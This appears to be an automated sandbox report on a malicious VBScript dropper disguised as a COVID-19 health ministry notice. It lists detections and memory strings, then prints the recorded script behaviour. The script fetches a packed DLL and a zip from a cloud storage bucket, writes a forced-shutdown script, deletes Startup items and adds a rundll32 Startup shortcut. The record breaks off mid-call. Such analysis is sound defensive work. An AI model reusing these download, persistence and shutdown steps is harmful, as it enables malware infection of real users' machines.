Source: C:\Users\user\AppData\Roaming\44788286328315\ttmdaoktkityhfkfg34112692654132.dll | Avira: detection malicious, Label: TR/Black.Gen2 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-16-5[1].dll | Avira: detection malicious, Label: TR/Black.Gen2 |
Source: C:\Users\user\AppData\Roaming\44788286328315\ttmdaoktkityhfkfg34112692654132.dll | Joe Sandbox ML: detected |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-16-5[1].dll | Joe Sandbox ML: detected |
Source: | Binary string: scrrun.pdb source: wscript.exe, 00000001.00000002.601221943.000001A4B2220000.00000002.00000001.sdmp |
Source: | Binary string: wscript.pdbGCTL source: wscript.exe, 00000001.00000002.601137414.000001A4B21A0000.00000002.00000001.sdmp |
Source: | Binary string: wscript.pdb source: wscript.exe, 00000001.00000002.601137414.000001A4B21A0000.00000002.00000001.sdmp |
Source: | Binary string: scrrun.pdbUGP source: wscript.exe, 00000001.00000002.601221943.000001A4B2220000.00000002.00000001.sdmp |
Source: | Initial file: .write ZXDFVHIJXTXNZLNYYGEJOJNR.responseBody |
Source: | Initial file: .savetofile LJETZISNBGIJOFCVGWUIZSLT, 2 |
Source: | Initial file: .write BFLCAJXFUHBOZFMBDCLJVIWJ.responseBody |
Source: | Initial file: .savetofile SASLHXXIDQYMUYFJXVRVATCD, 2 |
Source: Joe Sandbox View | IP Address: 8.8.8.8 8.8.8.8 |
Source: Joe Sandbox View | ASN Name: GOOGLEUS GOOGLEUS |
Source: wscript.exe, 00000001.00000002.607733865.000001A4B42BB000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: wscript.exe, 00000001.00000002.607837899.000001A4B42D0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0 |
Source: wscript.exe, 00000001.00000002.607837899.000001A4B42D0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0? |
Source: wscript.exe, 00000001.00000002.607837899.000001A4B42D0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gsr202 |
Source: wscript.exe, 00000001.00000002.607733865.000001A4B42BB000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gts1o1core0 |
Source: wscript.exe, 00000001.00000002.607733865.000001A4B42BB000.00000004.00000001.sdmp | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0 |
Source: wscript.exe, 00000001.00000002.607520766.000001A4B429F000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com |
Source: wscript.exe, 00000001.00000002.607837899.000001A4B42D0000.00000004.00000001.sdmp | String found in binary or memory: https://pki.goog/repository/0 |
Source: wscript.exe, 00000001.00000002.607260420.000001A4B426B000.00000004.00000001.sdmp | String found in binary or memory: https://storage.googleapis.com/ |
Source: wscript.exe, 00000001.00000002.607260420.000001A4B426B000.00000004.00000001.sdmp | String found in binary or memory: https://storage.googleapis.com/7 |
Source: wscript.exe, wscript.exe, 00000001.00000002.606699710.000001A4B3FCD000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.606781779.000001A4B4108000.00000004.00000001.sdmp | String found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zip |
Source: wscript.exe, wscript.exe, 00000001.00000002.606699710.000001A4B3FCD000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.607607145.000001A4B42AE000.00000004.00000001.sdmp | String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dll |
Source: wscript.exe, 00000001.00000002.602734156.000001A4B231C000.00000004.00000020.sdmp | String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dllenu |
Source: P-16-5[1].dll.1.dr | Static PE information: .vmp0 and .vmp1 section names |
Source: C:\Windows\System32\wscript.exe | Process Stats: CPU usage > 98% |
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-16-5[1].dll E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651 |
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\44788286328315\ttmdaoktkityhfkfg34112692654132.dll E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651 |
Source: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs | Initial sample: Strings found which are bigger than 50 |
Source: P-16-5[1].dll.1.dr | Static PE information: Number of sections : 12 > 10 |
Source: classification engine | Classification label: mal92.evad.winVBS@1/6@0/2 |
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\wfcfjfsoqjp.vbs | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs' |
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: wscript.exe, 00000001.00000002.609198281.000001A4B65ED000.00000004.00000001.sdmp | Binary or memory string: select * from Win32_OperatingSystem where Primary=true"); |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface:
  Script buffer (line breaks restored):
    WScript.Shell")
    WScript.Sleep(300000)
    Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _
    & "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_
    & "Primary=true")
    for each OpSys in OpSysSet
    retVal = OpSys.Win32Shutdown(6)
    next
  Recorded COM calls, in order:
    IHost.CreateObject("Wscript.Shell")
    IWshShell3.SpecialFolders("AppData")
    IFileSystem3.CreateTextFile("C:\Users\user\AppData\Roaming\wfcfjfsoqjp.vbs", "true")
    ITextStream.Write("Set SFHISGAPSMULDDGFLMFHDFTG = CreateObject("WScript.Shell")")
    ITextStream.Write("WScript.Sleep(300000)")
    ITextStream.Write("Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _")
    ITextStream.Write("& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_")
    ITextStream.Write("& "Primary=true")")
    ITextStream.Write("for each OpSys in OpSysSet")
    ITextStream.Write("retVal = OpSys.Win32Shutdown(6)")
    ITextStream.Write("next")
    ITextStream.Close()
    IWshShell3.SpecialFolders("StartUp")
    IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk", "true")
    IWshShell3.SpecialFolders("StartUp")
    IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs", "true")
    IWshShell3.SpecialFolders("AppData")
    IFileSystem3.CreateFolder("C:\Users\user\AppData\Roaming\44788286328315")
    IWshShell3.SpecialFolders("AppData")
    IWshShell3.SpecialFolders("AppData")
    IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/0.zip", "false")
    IServerXMLHTTPRequest2.send()
    _Stream.Type("1")
    _Stream.Open()
    IServerXMLHTTPRequest2.responseBody()
    _Stream.Write("Unsupported parameter type 00002011")
    _Stream.SaveToFile("C:\Users\user\AppData\Roaming\0.zip", "2")
    IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/P-16-5.dll", "false")
    IServerXMLHTTPRequest2.send()
    _Stream.Type("1")
    _Stream.Open()
    IServerXMLHTTPRequest2.responseBody()
    _Stream.Write("Unsupported parameter type 00002011")
    _Stream.SaveToFile("C:\Users\user\AppData\Roaming\44788286328315\ttmdaoktkityhfkfg34112692654132.dll", "2")
    IHost.CreateObject("Wscript.Shell")
    IWshShell3.SpecialFolders("StartUp")
    IHost.CreateObject("WScript.Shell")
    IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\puyfmugprn .lnk")
    IWshShortcut.TargetPath("rundll32")
    IWshShortcut.Arguments(" C:\Users\user\AppData\Roaming\44788286328315\ttmdaoktkityhfkfg34112692654132.dll SFsb9V5o7LTfxDWhDoh")
    IWshShortcut.Win |